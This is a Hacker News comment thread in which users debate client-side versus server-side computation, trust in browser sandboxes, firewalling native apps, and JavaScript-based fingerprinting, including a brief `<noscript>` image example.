Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

If web sites have to so dynamic, I much prefer that the computation involved is done on their machine than on mine. I simply don't trust random web sites enough to let them run code on my machines.


What is it you dont trust? This Fear Uncertainty & Doubt clashes heavily with the excellent security sandbox the web browser is. What is the harm you are afraid of? What are you supposing the risk is/what's in jeapordy here?


Relying on sandboxes seems unwise to me. They're a useful backstop, but shouldn't be the primary defense. The primary defense is to minimize the exposure to risk in the first place.

As to what harm I'm avoiding, it's mostly around tracking -- which is something that browsers have a very difficult time preventing, especially if sites are allowed to run code in them.


So lets say a resume generator website, or a document converter, etc.

You trust uploading your personal information to a server to generate the pdf/image/whatever vs doing it in solely in the browser?

Doing more on the server would lead to more tracking, not less.


Well, I wouldn't use such a website anyway (especially a document converter -- that is better done using a real application), regardless of where the processing was done, unless I was very certain that the website was trustworthy. For one thing, even if the website purports to not move my data to their servers, how do I know they're being truthful without going to extremes such as sniffing traffic?

There have been plenty of sites that have lied about such things.


You can swap out my examples for anything really.

The point is the more work the server does, the more data you have to send them to do that work.

As far as trusting it's client-side only, opening the network tab in devtools would suffice.

If you think they broke the sandbox (Google would pay millions for that!), yes sniffing would be the next step.

At least you have a sandbox on web, you usually don't have that for native apps.

But that's all better than willingly sending data to another entity's server and trusting them to not abuse/leak it.


With a couple of necessary exceptions, I don't use websites to store or process personal data, so that's not really the use case I have in mind.

What I have for native applications that I don't for the web is the ability to firewall off the native applications.


> What I have for native applications that I don't for the web is the ability to firewall off the native applications.

There you're placing trust on the firewall's sandbox. Are you sure the application can't communicate with the outside at all? DNS exfliltration for example?


A firewall is not a sandbox, but yes, I am sure that the applications can't communicate with the outside at all. My logs would show if they were. Any and all packets that originate from them are dropped, including DNS lookups and the like.


JS allows for fingerprinting. I only run JS on a opt-in basis on like my bank and some pages I trust. You don't miss much really.

https://amiunique.org/fp


"Has JS disabled" is in itself a good fingerprint factor though.


how would a website inform the server of that fact though?


I dunno, how about <noscript> <img src="/ihavejsdisabled.png"/> </noscript> ?


actually most people will miss out on most of the usable internet without javascript. not everyone goes to the same sites as you or has the same browsing patterns.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: